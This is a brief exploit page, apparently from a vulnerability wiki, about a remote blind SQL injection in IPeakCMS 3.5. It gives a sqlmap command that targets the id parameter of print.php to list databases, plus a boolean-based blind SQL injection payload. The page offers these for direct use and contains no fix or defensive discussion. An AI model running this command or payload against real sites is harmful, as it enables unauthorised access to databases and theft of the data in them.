Revision as of 10:57, 1 June 2021 by Pwnwiki(talk | contribs)(Created page with "<languages /> <translate> ==簡介== IPeakCMS3.5存在遠程SQL盲注漏洞。 </translate> ==POC== <pre> Use SQLmap if you've found the valid id... e.g: sqlmap -u "site.com/...")
Use SQLmap if you've found the valid id...
e.g: sqlmap -u "site.com/cms/print.php?id=1" --dbs
Payload : id=(SELECT (CASE WHEN(3104=3104) THEN 1 ELSE (SELECT 8458) END))